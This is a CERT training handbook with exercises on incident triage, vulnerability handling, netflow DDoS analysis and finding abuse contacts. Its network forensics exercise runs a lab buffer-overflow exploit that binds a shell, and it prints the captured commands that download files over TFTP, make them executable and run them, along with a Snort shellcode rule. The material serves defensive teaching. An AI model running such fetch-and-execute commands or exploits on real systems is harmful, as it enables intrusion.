cert exercise toolset

8/12/2019 CERT Exercise Toolset

1/52


2/52


3/52

Table of contents

Exercise 1: Triage and Basic Incident Handling 2

Exercise 2: Incident Handling Procedure Testing 7

Exercise 3: Recruitment of CERT Staff 10

Exercise 4: Developing CERT Infrastructure 14

Exercise 5: Vulnerability Handling 16

Exercise 6: Writing Security Advisories 18

Exercise 7: Network Forensics 21

Exercise 8: Establishing External Contacts 37

Exercise 9: Large-scale Incident Handling 40

Exercise 10: Automation in Incident Handling 44

Exercise 11: Incident Handling in Live Role Playing 46

Exercise 12: Cooperation with Law Enforcement Agencies 47

CERT Exercises Toolset 1


4/52

Exercise 1Triage and Basic Incident Handling

CERT Exercises Toolset

EXERCISE TASK

You are an incident response investigator working for Utopia CERT. This team is part of a researchand academic network in Utopia a decent ISP serving universities and high schools. As the oldestand most recognised IRT in Utopia, your team is quite often approached about all security incidentshappening in your country. You maintain good relationships with other providers and have secure

and effective ways of sharing information with them.

You start your work at 8 am with 9 reports in your mailbox. Read through them and try tounderstand what really happened and what are the reporters expectations. How are you going tohandle them? Whom will you contact and what information will you share? For each report, assignONE type from your classification scheme and give a priority of high, medium or low, determiningthe order in which you would handle the incidents. Make sure you are ready to explain yourdecisions and keep in mind that you are the decision-maker here there is no single correctanswer.

Unless instructed otherwise by the trainer, launch the Icedove mail client from the LiveDVD. You willfind the incident reports in the Inbox.

The reports are taken from real life. They were anonymised according to the following rules:

10/8 are networks located in Utopia; 10.187/16 are networks of Utopia NREN; and .ut is Utopias top-level domain.

WHAT WILL YOU LEARN?

This exercise will give you some practice in triage the initial incident handling phase, covering:

verification of the report (did the incident actually occur?); interpretation (what actually happened?); determination of the scope of incident (what are the actual and possible consequences for

your constituency and others?);

classification; and prioritisation (based on the previous factors).

After finishing the exercise you should understand what to focus on during initial analysis, howdifferent factors may affect priorities, and how to communicate with reporters as well as thirdparties.


5/52

The classification scheme used in Utopia CERT1:


Description / Examples

Unsolicited bulk e-mail, which means that therecipient has not granted verifiable permission forthe message to be sent and that the message issent as part of a larger collection of messages, allhaving an identical content.

Discrediting, or discrimination against, somebody(ie, cyberstalking)

Child pornography, glorification of violence, ...

Software that is intentionally included or insertedin a system for a harmful purpose. A userinteraction is normally necessary to activate thecode.

Attacks that send requests to a system to discoverweak points. This includes also some kinds oftesting processes to gather information abouthosts, services and accounts. Examples: fingerd,DNS querying, ICMP, SMTP (EXPN, RCPT, ).

Observing and recording network traffic(wiretapping).

Gathering information from a human being in anon-technical way (eg, lies, tricks, bribes, orthreats).

An attempt to compromise a system or to disruptany service by exploiting vulnerabilities with a

standardised identifier such as a CVE name (eg,buffer overflow, backdoors, cross side scripting,etc).

Multiple login attempts (Guessing or crackingpasswords, brute force).

An attempt using an unknown exploit.

Incident Class(mandatoryinput field)

AbusiveContent

Malicious Code

InformationGathering

IntrusionAttempts

Incident Type(optional but desiredinput field)

Spam

Harassment

Child/Sexual/Violence/...

Virus

Worm

Trojan

Spyware

Dialler

Scanning

Sniffing

Social Engineering

Exploiting Known

Vulnerabilities

Login Attempts

New Attack Signature

1 This classification was developed during the eCSIRT.net project on CERT cooperation and common statistics.

More information can be found at:http://www.ecsirt.net/cec/service/documents/wp4-clearinghouse-policy-v12.html#HEAD6


6/52


A successful compromise of a system orapplication (service). This could have been causedremotely by a known or a new vulnerability, butalso by an unauthorised local access.

In this kind of an attack, a system is bombardedwith so many packets that the operations aredelayed or the system crashes. Examples of aremote DoS are SYS-a, PING-flooding or E-mailbombing (DDoS: TFN, Trinity, etc). However,

availability can also be affected by local actions(destruction, disruption of power supply, etc).

Besides the local abuse of data and systems,information security can be endangered by asuccessful account or application compromise.Furthermore, attacks that intercept and accessinformation during transmission (wiretapping,spoofing or hijacking) are possible.

Using resources for unauthorised purposes,including profit-making ventures (eg, the use ofe-mail to participate in illegal chain letters forprofit or pyramid schemes).

Selling or installing copies of unlicensedcommercial software or other copyright protectedmaterials (Warez).

Type of attacks in which one entity illegitimatelyassumes the identity of another in order to benefitfrom it.

If the number of incidents in this categoryincreases, it is an indication that the classificationscheme needs to be revised.

Intrusions

Availability

InformationSecurity

Fraud

Other

Privileged AccountCompromise

Unprivileged AccountCompromise

Application Compromise

DoS

DDoS

Sabotage

Unauthorised Access toInformation

UnauthorisedModification ofInformation

Unauthorised Use ofResources

Copyright

Masquerade

All incidents which donot fit in one of thegiven categories shouldbe put into this class.


7/52

Complete the table below to assign an appropriate classification and priority to each of the reports.The priority should be a number between 1 and 3: 1 top priority 2 normal priority 3 low priority


# Report Subject Classification Priority Suggested Actions

1 (from: UKSUtopia

Inspections)

2 Abuse: 10.187.137.4

3 [SpamCop

(http://www.company.ut/)

id:3091085703]

3-4 June Workshops

for Managers

4 [CERTPT #56817]

Unauthorised access

attempt registered


8/52


5 Incident 10.187.21.203

6 [SpamCop

(http://www.bigoil.ut/cgi-bin/internet.exe/portal/ep/home.

do?tabId=0)

id:3120641650]----

BIGOIL CO. Search

(Immediate Part-Time

JOB for

7 Incident 10.187.108.39

8 Bank Phish Site [211889]

Please Reply

9 [MBL# 89603] Malware Block

List Alert


9/52


Exercise 2Incident Handling Procedure Testing

EXERCISE TASKS


In this exercise you will learn how to build your own incident handling procedure how toidentify the most important players in this procedure, the critical points and the most suitablemeans of communication.

You will become familiar with the basic set of activities relating to the incident handlingprocess.

You will learn the correct sequence of activities during the incident handling process. You will gain knowledge about the most important parts of the IH procedure, those that havea critical influence on the successful process which will be provided to you.

You will become familiar with all possible players in the IH process. You will learn the most effective methods for cooperation between a CSIRT and the key

incident handling players.

Developing incident handling procedure

Using the incident handling procedure objects, form a complete incident handlingprocedure. Make the proper sequence of the activities, build relationships between

them, and show the directions of the work flows. Additionally, extend the procedurewith your proposals for activities using the blank objects.

After forming a procedure, identify the activities which require communication withexternal parties. For each of them, indicate the recommended means ofcommunication (eg, a normal e-mail, a phone, an encrypted e-mail, etc).

Analyse your procedure. Point out the critical elements and identify the potentialproblems which could appear during execution of a procedure.

Use Appendix 1 for this task.

Task 1


10/52


Appendix 1


11/52


12/52


EXERCISE TASKS


The purpose of this exercise is to improve your ability to optimally recruit staff for the CERTteam. You will learn:

What kind of professional experience and/or qualifications, as well as personal abilities, areessential to fulfil the main roles and responsibilities of a CERT;

What kinds of questions should be asked during a job interview; and How to choose the most suitable candidates for the CERT team.

Writing job advertisements for recruiting CERT staff

You will be either a member of the Technicians or Researchers group. The task ofyour group is to complete a job advertisement template for positions in either theIncident Handling Service or the Security Project Development Team respectively(see Appendix A). Be prepared to present your job advertisement proposal to others.

Task 1

Exercise 3Recruitment of CERT Staff

Analysing and choosing candidates to be interviewed

Each group will receive a collection of 6 CVs. Analyse all the CVs and try to matchthem with the prepared job offers. Write short opinions about all the candidates(strong and weak points, pros and cons in several aspects). Be prepared to presentyour opinions about all candidates and justify your choice.

Task 2

Interviews with chosen candidates

Read the code of conduct developed by TF CERT. Using the CoC, your prepared jobadvertisement and the CVs of the chosen candidates, propose up to 20 interviewquestions (5 general, 5 technical, 10 others) that you would like to ask the candidatesof your choice. (Use the blank template in Appendix B.)

Be prepared to present your questions to others and explain which of them you findthe most useful. The trainer will also propose a few questions and let you decide whichof them you consider important. Decide on a set of 10 questions to be asked of achosen candidate. After a 15 minute break, volunteers from each group will play theroles of the chosen candidates and the others will start to interview them. Every groupjoins all the interview sessions. After each interview, the groups individually discussthe candidates answers and share opinions.

Task 3

Final selection of the best candidates

After all the interviews, prepare your own opinion about all the candidates and makeyour selection (with justifications). Then vote for the candidates.

Task 4


13/52

Main tasks:

Handling network security incidents Operating the CERT early warning and alerting system for a CERT constituency Writing security advisories Writing security news Preparing CERT reports

Essential requirements (technical qualifications, knowledge and personal skills)

Additional assets

We offer


Appendix AJob Advertisement for IT Security Specialist(Incident Handling Service)


14/52


Main tasks:

Participation in projects related to the security network Carrying out research on new methods for the detection and analysis of malicious software Development of concepts for IT projects to pursue new solutions Cooperation with software engineers in the implementation of the proposed solutions Testing developed applications Writing technical documentation Development of IT security policies

Essential requirements (technical qualifications, knowledge and personal skills)

Additional assets

We offer

Job Advertisement for IT Security Specialist(Incident Handling Service)


15/52

Candidate 1 Candidate 2

I. General issues:

1.

2.

3.

4.

5.

II. Technical knowledge and qualifications:

1.

2.

3.

4.

5.

III. Personal skills:

1.

2.

3.

4.

5.

IV. Facultative questions:

1.

2.

3.

4.

5.


Appendix BJob Interview Questions Form


16/52

EXERCISE TASKS

Although the roles and functions of CERTs vary, there are many common services provided by

different CERTs. The trainer will give you a general introduction to common CSIRT service models. Asuggested model for this exercise is presented at http://www.cert.org/csirts/services.html. You willcreate a concept for providing these services. The trainer will act as a mentor, asking leadingquestions to help you find your way. An example service Incident Handling Incident Analysis will be completed at the beginning, with the trainer playing a more important role to give you abetter understanding how you should proceed. Handouts with network diagrams will be provided tomake your task easier.



The aim of this exercise is to provide you with an understanding of the software tools andhardware required by a CERT in order to offer a service.

Incident Handling Incident Analysis

Attached below you will find diagrams showing the infrastructure of a new CERT. ThisCERT is expected to provide an incident handling service. Your task is to answer the

questions of the trainer regarding the infrastructure needed to provide the service. Isthe architecture, as presented, sufficient? Do you have ideas on what software will berequired? Any suggestions for improvements?

Task 1

Exercise 4Developing CERT Infrastructure

Further 3-5 services

Together with the trainer, choose 3-5 services as described in the CERT document.Modify and expand the existing infrastructure shown in the diagrams below in order toachieve your desired goal of providing these services. Enumerate the software youwould use.

Task 2


17/52



18/52


EXERCISE TASKS


The objective of this exercise is to give you a practical overview of the vulnerability handlingprocess and how vulnerabilities reported to a CERT team should be handled. You will learn:

What the main responsibilities of a CERT team involved in a vulnerability case are; How to design a vulnerability disclosure policy suitable for your CERT; and How to deal with difficult situations that may arise through your role as a coordinator.

Responsibilities of a CERT team in a vulnerability case

You will hear a description of a typical vulnerability case. Your task is to identify theCERTs main responsibilities and activities in handling the reported vulnerability.

Think about the responsibilities which the CERT has as coordinator towards thevendor and the reporter of the vulnerability.

Name the actions that CERT has to take to resolve the case.

Keep in mind that the CERT team always acts as an independent coordination centre.

Task 1

Exercise 5Vulnerability Handling

Vulnerability disclosure

The vulnerability handling process always involves the problem of disclosinginformation about the vulnerability. What is your opinion on vulnerability disclosure?Do you think this information should be kept secret or publicly disclosed? Think aboutthe advantages and disadvantages of disclosing a vulnerability.

Task 2

Designing a vulnerability disclosure policy

Now you have some ideas as to what responsible vulnerability disclosure should be.What main aspects should be addressed in a vulnerability disclosure policy? Develop ageneral policy for your CERT.

Task 3

Role-playing game: Introducing CERT coordination in a vulnerability case

The trainer will tell you two stories. One will be a true story from the past, based onthe Michael Lynn case: http://en.wikipedia.org/wiki/Michael_Lynn. The second one isa scenario which will be used in the game.

Task 4


19/52


The rules of the role-playing game:

The trainer is the game leader. A game leader has an absolute power to shape, modify and adjust a game scenario; ie:

he can stop an action and introduce new factors and new conditions; he can rewind an action to change factors or conditions or actions already performed; and he can accelerate an action to avoid valueless activities.

All students must fit their actions to what the trainer decides. Students can communicate during a role-playing game only as players, not as students (eg, they

are not allowed to comment on an action, unless the trainer changes it). A main purpose of the trainer is to achieve the goals of the exercise.

Identification of vulnerability handling phases

During this post role-playing activity, students are given the task of identifying asmany activities and processes as possible. This is achieved by a kind of brain-storming session with the trainer as the group leader.

Task 5

Coordination of a single and multiple vendor case

During the game in the previous task, you dealt with a single vendor case. It mayhappen, however, that a reported vulnerability affects more than one vendor. Thinkabout the possible complications in a multiple vendor case. The trainer will give yousome tips on the aspects you should consider especially carefully.

Task 6


20/52


21/52

Document

US-CERT

(TCSA)

US-CERT(VN)

N

VDNIST

SecurityFocus

Secunia

Microsoft

ISC

Problem

nameandID

Threatse

verityandimpact

Affectedsystems

Descriptio

n

Possibler

emedies(solutions,

workarou

nds,

patchlocations)

Reference

s

Revisionnotes

Otherfiel

ds:digitalsignatures,

contactin

formation?

How

infor

mative?

Structure

ofthedocuments?

Additiona

lcomments


DNSCVE-2

008-1447Checklist:


22/52


CVSS basics and tools

Listen carefully to the introduction to CVSS by the trainer. Click through the availableCVSS calculators you will need to use them for the next tasks.

Task 1

PART 2 CVSS TRAINING

This part of the exercise is devoted to learning the basics of CVSS.

CVSS vectors and metrics of the DNS CVE-2008-1447 vulnerability

Together with the trainer, you will calculate CVSS scores for the DNS CVE-2008-1447vulnerability.

Task 2

Calculating CVSS scores by yourself

In this task, students will be split into smaller groups. Your group should create ashort description of an organisation and its network. Next, pick a security vulnerabilityfound in an advisory and calculate its CVSS scores. The trainer may introducedifferent variants of this exercise.

Task 3


23/52


Exercise 7Network Forensics

EXERCISE TASKS


The network forensics exercise is aimed at introducing you to the post-mortem analysis of pcapfile dumps and Cisco netflow logs. In particular you will:

Learn how worms and botnets infect machines; Learn about client side attacks and fast flux networks; Learn what DDoS attacks look like from an ISPs viewpoint; and Learn about the tools used for analysing these attacks after the fact.

Introductory scenario fake web server vulnerability exploitation step-by-step

In this scenario, you will be led through a step-by-step explanation of the exploitationand infection process performed against a server application.

Task 1

The exercise is split into three different parts, each composed of two scenarios (tasks). At the startof the exercise, you will be given a brief introduction to the field of network forensics. The trainerwill then introduce you to the world of buffer overflows, which will help you analyse the pcap traces.

The exercise list is as follows: pcap trace analysis server side attack; pcap trace analysis client side attack; netflow analysis.

PART 1 PCAP TRACE ANALYSIS SERVER SIDE ATTACK

The exercise is divided into two separate scenarios:

a demonstration performed by the teacher as the introductory scenario; and network forensics skills training with the logs of a real attack.

This demonstration covers the whole process of the exploitation of a server side service. A speciallyprepared vulnerable HTTP server was implemented. The server obeys the rules of the HTTP protocolwhen it receives GET requests. However, whenever a POST request is received, a separate threadwill be launched to bind a shell to port 12345. Assuming that the POST request will inject propershellcode, this fake exploitation does not differ from a real one from the standpoint of the network.Shellcode that binds a command shell to 12345 port was obtained from the Metasploit framework(http://www.metasploit.org).

During the exploitation process, you should use the wireshark network analyser to capture thetraffic. Wireshark will capture all the packets that were received and transmitted on a particularnetwork interface. The next step in the exercise is a discussion concerning the consequent stages ofthe attack as seen through wireshark.


24/52

Tools necessary for carrying out this exercise

The following are the tools necessary for conducting this exercise. These tools can be found on theLiveDVD (usr/share/exercises/07_NF/adds/):

http server; exploit (/usr/share/exercises/07_NF/adds/exploit); wireshark; tftp server; and tftp client.

Before running the vulnerable HTTP server, make sure that the Apache server has been stopped.(Remember to restart it again to carry out other exercises later on!):sudo /etc/init.d/apache2 stop

To run the server type:sudo /etc/init.d/http_server

The exploits can be found in the exercise directory.

The exercise can be demonstrated using one machine only or on a set of two machines. In the caseof a single machine presentation, the attacking machine will have the same IP address as thevictim. As this situation is unlikely in a real scenario, it is recommended that two machines be usedfor this exercise if possible. The two machine scenario is illustrated below:

Both computers should be booted with the Exercise LiveDVD. To configure the interfacesappropriately, run the scripts provided on the Exercise LiveDVD: interface_victim andinterface_attacker. If the computer has multiple interfaces, provide the name of the one to beconfigured as a parameter to the script:interface_victim eth1

If no parameters are provided, the scripts will configure the first interface.

Further descriptions of the exercise assume that only one machine was used during the exercise,which means that victims and attackers IP address is 127.0.0.1. In the case of a two-machinepresentation, in all the following commands the attackers address should be replaced with192.168.0.2 and the victims with 192.168.0.1.

The pcap file attached to this exercise on the LiveDVD (/usr/share/exercises/07_NF/adds/) containslogs of attacks launched from an IP address which is different from the victims.



25/52


Step-by-step demonstration

Before launching the exploit, a benign request to the HTTP server can be sent. Run wireshark andstart live capture on the loopback interface. Now, run the browser and go to www.example1.comsite. This example site is served locally. To increase the amount of benign requests, perform someinteraction with this simple site.

The exploit will result in the copying of some files from the attacker to the victim machine. Files willbe copied to the home directory of the user who ran the HTTP server. As the HTTP server was runwith root privileges, the files will be copied to the /root/ directory and all actions performed by thecompromised server will use the privileges of the super-user. This example shows why servicesshould be run with only a minimal set of privileges!

Before running the exploit, check the list of files in the home directory of the root user. In theconsole, type: ls ~. Now, run the exploit. There are two options to be given: the victims IPaddress and the TFTP server IP address. Both addresses are the same as the local loopbackinterface: 127.0.0.1. Change the working directory to the exercises directory and type ./exploith127.0.0.1 t127.0.0.1 .

The consecutive actions that the exploit undertakes will be reported to the console:

[*] Connecting to vulnerable HTTP Server...done

[*] Sending buffer overflow data...done

[*] Attempting to connect to shell: 127.0.0.1: 12345...succeeded

[*] Sending commands to compromised server...done[*] Bye!

The packets which caused this successful exploitation were captured by wireshark and can now beinvestigated.

To single out the packets which were sent to the HTTP server, apply the following filter:


26/52


The first HTTP request was performed by the web browser. The filter allows the tracking of all thepackets that were sent:

Source Destination Protocol Info

127.0.0.1 127.0.0.1 TCP 55177 > www [SYN]

127.0.0.1 127.0.0.1 TCP www > 55177 [SYN, ACK]

127.0.0.1 127.0.0.1 TCP 55177 > www [ACK]127.0.0.1 127.0.0.1 HTTP GET / HTTP/1.1

127.0.0.1 127.0.0.1 TCP www > 55177 [ACK]

127.0.0.1 127.0.0.1 HTTP Continuation or non-HTTP traffic

127.0.0.1 127.0.0.1 TCP 55177 > www [ACK]

127.0.0.1 127.0.0.1 TCP www > 55177 [FIN, ACK]

127.0.0.1 127.0.0.1 TCP 55177 > www [FIN, ACK]

127.0.0.1 127.0.0.1 TCP www > 55177 [ACK]127.0.0.1 127.0.0.1 TCP 55178 > www [SYN]

127.0.0.1 127.0.0.1 TCP www > 55178 [SYN, ACK]

127.0.0.1 127.0.0.1 TCP 55178 > www [ACK]

127.0.0.1 127.0.0.1 HTTP GET /favicon.ico HTTP/1.1

127.0.0.1 127.0.0.1 TCP www > 55178 [ACK]127.0.0.1 127.0.0.1 HTTP Continuation or non-HTTP traffic

127.0.0.1 127.0.0.1 TCP 55178 > www [ACK]

127.0.0.1 127.0.0.1 TCP www > 55178 [FIN, ACK]

127.0.0.1 127.0.0.1 TCP 55178 > www [FIN, ACK]

127.0.0.1 127.0.0.1 TCP www > 55178 [ACK]

There are two HTTP requests one for the index.html page and one for the favicon.ico file. Amalicious POST request was sent by the exploit:

127.0.0.1 127.0.0.1 TCP 54274 > www [SYN]

127.0.0.1 127.0.0.1 TCP www > 54274 [SYN, ACK]

127.0.0.1 127.0.0.1 TCP 54274 > www [ACK]

127.0.0.1 127.0.0.1 HTTP POST /inventory-check.cgi HTTP/1.1

127.0.0.1 127.0.0.1 TCP www > 54274 [ACK]

127.0.0.1 127.0.0.1 HTTP Continuation or non-HTTP traffic

127.0.0.1 127.0.0.1 TCP www > 54274 [ACK]

127.0.0.1 127.0.0.1 TCP 54274 > www [FIN, ACK]

127.0.0.1 127.0.0.1 TCP www > 54274 [ACK]

The fourth packet carries the POST request. The request consists of two packets and the body of theHTTP request carries the actual exploit shellcode, which is to be executed. Shellcode is basically a

long string of bytes of value 90 and then almost 90 bytes of assembler instructions (the first fourbytes of the shellcode is the address which overwrites the function return address). Due to theexecution of the shellcode, port 12345 is opened with the system shell bound to it. This is the endof interaction with the HTTP server.

As we know that the exploit opens port 12345, the traffic sent to this port can be investigated. Todo this, a proper filter, which will single out all the traffic targeted at or coming from port 12345should be applied:


27/52

To find the names of the files which were downloaded, it is more convenient to apply a filter thatshows only the first packet of each TFTP transmission:tftp.source_file

Now, list the contents of the roots home directory. The downloaded files, xhttp and exploit, shouldbe there. One of the commands which was executed launched xhttp. Check if this program is stillrunning:ps aux | grep xhttp

The output should show that a process named xhttp is running.

The filter results are as follows:

127.0.0.1 127.0.0.1 TCP 57620 > 12345 [SYN]

127.0.0.1 127.0.0.1 TCP 12345 > 57620 [SYN, ACK]

127.0.0.1 127.0.0.1 TCP 57620 > 12345 [ACK]

127.0.0.1 127.0.0.1 TCP 57620 > 12345 [PSH, ACK]127.0.0.1 127.0.0.1 TCP 12345 > 57620 [ACK]

127.0.0.1 127.0.0.1 TCP 57620 > 12345 [FIN, ACK]

From the packets payload we can see that, after a TCP connection had been initiated, the followingstring of commands was sent to the shell:cd ~; atftp --get --remote-file exploit2 192.168.0.121;

atftp --get --remote-file hello 192.168.0.121; chmod +x hello; ./hello

We have already discussed the meaning of these commands in the previous paragraphs.

In the next step, the exploit and xhttp files are downloaded onto the victims machine. To see theTFTP protocol packets, apply the following filter:tftp



28/52

The last point in this presentation of the attack is to check whether an intrusion detection systemnoticed anything suspicious. The Exercise LiveDVD contains Snort IDS. Alerts are reported in file:/var/log/snort/alert

To check for the latest alerts, type command:cat /var/log/snort/alert

You should notice one alert:

[**] [1:1000002:0] SHELLCODE x86 NOOP [**][Priority: 0]

06/14-16:35:30.367355 127.0.0.1:36944 -> 127.0.0.1:80

TCP TTL:64 TOS:0x0 ID:51437 IpLen:20 DgmLen:672 DF

***AP**F Seq: 0x2981E148 Ack: 0x6A7EC3DF Win: 0x2E TcpLen: 32TCP Options (3) => NOP NOP TS: 2107818 2038899

The alert was triggered by the following Snort rule:

alert ip any $SHELLCODE_PORTS -> $HOME_NET any

(msg: SHELLCODE x86 NOOP;

contentL:|90 90 90 90 90 90 90 90 90 90 90 90 90 90|;

depth:128; reference:arachnids,181; classtype:shellcode-detect; sid:648; rev:7;)

This rule alerts whenever a monitored network receives a packet containing at least 14 consecutivebytes of value 90. The event is triggered due to the fact that such a string is often an indication of ashellcode occurrence. The rule comes from a standard set of Snort rules.

PART 2 PCAP TRACE ANALYSIS CLIENT SIDE ATTACK

The next two scenarios are intended to be carried out by you with minimal assistance from the

trainer.


Dabber scenario

The second scenario of this exercise involves analysing the workings of the Dabberworm. To perform this exercise, you need to load the Dabber pcap file(/usr/share/exercises/07_NF/adds/). Analyse this pcap trace using the knowledgegained in the previous scenario and explain what happened, enumerating the stagesof the attack, what ports were involved in the attack, and how the exploit worked.

Task 2

Drive-by download without fast flux

Using the tools and knowledge acquired in the previous exercises, analyse the pcaptraces found on disk and answer the following questions in detail:

What happened (step-by-step)? Has the host been infected? If yes, what type of malware is it? How is the attack being carried out? What domains and IPs are involved in the attack? How could we mitigate the attack?

Task 1


29/52


30/52

Q 1 When did the attack begin?

GUI:Open the web-browser and go to http://10.20.31.210/nfsen/nfsen.php. For a better view you can goto the Graphs tab. You can see a huge increase in file size near Feb 24 2007 04:00:

CLI:Go to the directory /data/nfsen/profiles-data/live/upstream and list netflow files (nfcapd.*); use ls l(or the more human-readable: ls lh).

You can see that starting from 200702240400 the files are suddenly larger than before (before about 100-200kb; from 200702240400 more than 10MB). Near 200702241050 the files are gettingsmaller, but are still unusually large (about 6MB). From about 200702241605, the size of the filesseems to drop to normal levels.

So, the attack began around 04:00 on 24th February 2007.

Q 2 What is being attacked?

GUI:In order to identify what is being attacked, it is useful to analyse the details of the graphs and theTOP N statistics, generated both after and before the attack. Graphs and TOP N statistics generatedbefore the attack started can be treated as a baseline for comparison with later analysis.

Go to the Details tab (1). Pick Time Window from the list in Select field up (2). On the graph,select an area (3) that looks like normal activity before the attack started. This is about from

20:00 23 Feb 2007 to 03:50 24 Feb 2007. Look at the statistics (4) for this timeslot. (You shouldalso use the Sum radio button.) This will tell you that most of the activity was TCP.



31/52


Next, select an area on the graph that looks like the attack (from 04:00 24 Feb 2007 to about 16:0524 Feb 2007). The statistics say that most of the activity (flows, packets and traffic) was UDP.

Let us find out what is being attacked. Use netflow processing (reducing the time window, which inthis example was on Feb 24 from 04:00 to 09:00, to accelerate this process) to find the top 10statistics about the destination IP ordered by flows, packets, bytes or bits per second (bps). On thescreen below you can see the statistics generated by the packets.


32/52


33/52


34/52


35/52


There are 5 hosts that generate huge traffic to the attacked server. These IPs are the potentialattackers:33.106.25.243

207.39.221.61

213.63.169.117

43.170.142.7933.106.23.177

CLI:A quick way of checking what IPs may be involved in an attack against an IP is to generate statisticsfiltered towards that specific destination IP. In this case we can filter for the TOP N attacking sourceIPs based on flows against 195.88.49.121.

Q 3 What IPs are involved in carrying out the attack?

GUI:A quick way of checking what IPs may be involved in an attack against an IP is to generate statisticsfiltered towards that specific destination IP. In this case we can filter for TOP N attacking source IPsbased on flows against 195.88.49.121.

Use netflow processing. Select the time window from 2007-02-24-04-00 to 2007-02-24-09-00.Generate the TOP 20 statistics about the source IP, using the dst host 195.88.49.121 filter.


36/52


37/52

By modifying the filter (dst host) you can investigate the behaviour of each attacking IP separately.

CLI:In the command line interface, you could use the following command:nfdump -R nfcapd.200702240410:nfcapd.200702240900 -o extended -c 50 'dst ip195.88.49.121 and (src ip 33.106.25.243 or src ip 207.39.221.61 or src ip

213.63.169.117 or src ip 43.170.142.79 or src ip 33.106.23.177)'

Modify the dst host accordingly.

Conclusion:The attacking IP was sending UDP packets to a WWW server to many different destination ports, butalways from the same source port. All these five attacking IPs sent packets simultaneously. All the

packets had the same size: 29B.

Q 5 Where did the attack come from?

One issue that frequently arises for DDoS attacks is the question whether the source IPs arespoofed. With UDP DDoS attacks, this is usually quite likely. For TCP based attacks, flows can beused to deduce what flags were seen for connections, allowing for speculation as to whether anattack was spoofed or not. To track where an attack came from, one can also use netflow to observethe router interfaces from which the traffic entered. With the interface information it is possible toidentify the uplink, which can be used in turn to check its uplink and so on. This can also be used todiscover whether spoofing was involved.

CLI:For example, to see what flags were set:nfdump -R nfcapd.200702240410:nfcapd.200702240500 -c 50 -o extended 'dst ip

195.88.49.121 and (src ip 33.106.25.243 or src ip 207.39.221.61 or src ip

213.63.169.117 or src ip 43.170.142.79 or src ip 33.106.23.177)'

For example, to see the interfaces where the packets came from:nfdump -R nfcapd.200702240410:nfcapd.200702240500 -o fmt:%in 'src ip 33.106.25.243'| sort -u

Q 6 What could be done to mitigate the attack at the ISP level?

Some possible suggestions for attack mitigation might include the following:

If the attacked server is only a WWW server, without other services, you could block all UDP

traffic. This prevents repeated attacks from new IPs.

You could block UDP traffic destined only to high number ports (for example, if the attackedserver is also a DNS server and you cannot block all UDP traffic you could block all >53/UDP)

Rate limiting of UDP traffic is also a possibility.

When you finish Task 1, run nfsen_stop script available on your LiveDVD Desktop.(You can click on it.)



38/52


Task 2 can be found on the LiveDVD #2: Network Forensisc Task 2.

Make sure that the Apache server is running. Run the nfsen_start script available on your LiveDVD#2: Network Forensics Task 2 Desktop. (You can click on it.)

When you finish Task 2, run the nfsen_stop script available on your LiveDVD #2: Network ForensiscTask 2 Desktop. (You can click on it.)

DDoS Analysis (DIY)

In a similar manner to the first Task, you are required to analyse another DDoSattack. This time, you are expected to carry out the analysis with minimal help fromthe trainer. You are expected to:

identify when the attack began; identify what is being attacked; identify the IPs involved in carrying out the attack; identify the way the attack is being carried out; identify where the attack is coming from; and suggest ways of mitigating the attack at the ISP level.

Task 2


39/52


Exercise 8Establishing External Contacts

EXERCISE TASKS


The communication and exchange of information is one of the crucial aspects of a CERTs work.The more effectively information is shared and exchanged between interested parties, the fastersecurity incidents can be mitigated and the less the damage that occurs. Thus, it is veryimportant to have at hand and to know how to use sources of contact information, networks ofcontacts and other channels for the distribution and sharing of data.

The goal of this exercise is to enhance your skills in establishing contacts with other CERTs,

administrators of ISPs and other parties responsible for the mitigation of security incidents intheir networks around the globe. You will be asked to identify and contact the proper authoritiesabout real incidents. After finishing the exercise, you should be able to establish and developnetworks of contacts faster and more effectively.

Session OneYou have received a number of logs indicating remote attacks. Your task will be to informadministrators of networks causing these attacks about the problem and ask them to mitigate it.Begin with identifying the right contacts.

We suggest starting with querying the whois databases of regional Internet registries (RIRs). Theykeep information about the network providers being assigned a given range of IP addresses. Inturn, the providers can usually make the information more granulate by adding information aboutsubnets and their networks. Note that each regional registry has its own separated database whichcovers the address space administered by that registry. Currently, there are five regional Internetregistries:

ARIN: American Registry for Internet Numbers (http://www.arin.net/) covers North America andparts of the Caribbean;

RIPE NCC (http://www.ripe.net/) for Europe, Middle East and Central Asia; APNIC: Asia-Pacific Network Information Centre (http://www.apnic.net) for Asia and the Pacific; LACNIC: Latin American and Caribbean Internet Address Registry (http://www.lacnic.net/) for

Latin America and parts of the Caribbean; and AfriNIC: African Network Information Centre (http://www.afrinic.net/) for Africa.

The registries offer whois services via web interfaces and standard whois protocol.

Since it is not possible to determine which RIR to ask just by looking at the IP address (or at leastnot without sufficient prior experience), numerous services exist which can do this for you byquerying multiple servers to find the correct one. One of the services we recommend for this isDomain Dossier from CentralOps.net, located at http://centralops.net/co/DomainDossier.aspx. Whilethis service offers multiple other functionalities, for the time being we settle for network whoislookup. Look for contacts listed in cert-nfy (RIPE, APNIC), tech-c, OrgAbuseEmail (ARIN) orsimilar, as well as for any contacts the server refers to directly as abuse.


40/52

Another approach is to use the domain name and user contact information for the domain. Notethat this can be much less accurate, because:

many institutions can get network or hosting services from a single provider and so do notbother to have reverse DNS entries, thus sharing a single providers domain in many casesthey will, however, have different entries in RIR whois databases;

the domain name system is hierarchical and sometimes the different levels of a domain namecan be confused; and

some domain registries hide pieces of information that are considered private and protected bylocal law (eg, the name and last name of a private person can be treated as personal data).

Note that, in any case, going after the domain owner should eventually bring you to the personresponsible for a particular host in the worst case, they should be able to redirect you one hop

further but usually it takes longer than going from the network providers end.

When looking up the domain owner, do not confuse registrar with registrant. Although the termssound similar, the first one is actually the organisation where the domain was registered, while thelatter is the domain owner.

Contact information for a domain is kept in a domain whois database a separate one for each top-level domain. Most registries provide lookup tools for their databases via a web frontend andsometimes also via a standard whois interface. The quality and format of the information returnedvaries greatly. Again, Domain Dossier has a tool that does lookups at the appropriate servers foryou (when available). This time use the domain whois record feature.

Yet another way to look for administrative contacts is to look for a web page of the company. Youmay try entering the hostname into the browser directly or guess the name by adding www tovarious parts of the domain name. For example, for a hostname melkor.nask.waw.pl you would besuccessful with www.nask.waw.pl.

Warning! When visiting unknown web pages, consider using a disposable system, eg, a virtualmachine which you do not mind getting infected. This is especially true when visiting potentiallyinfected sites.

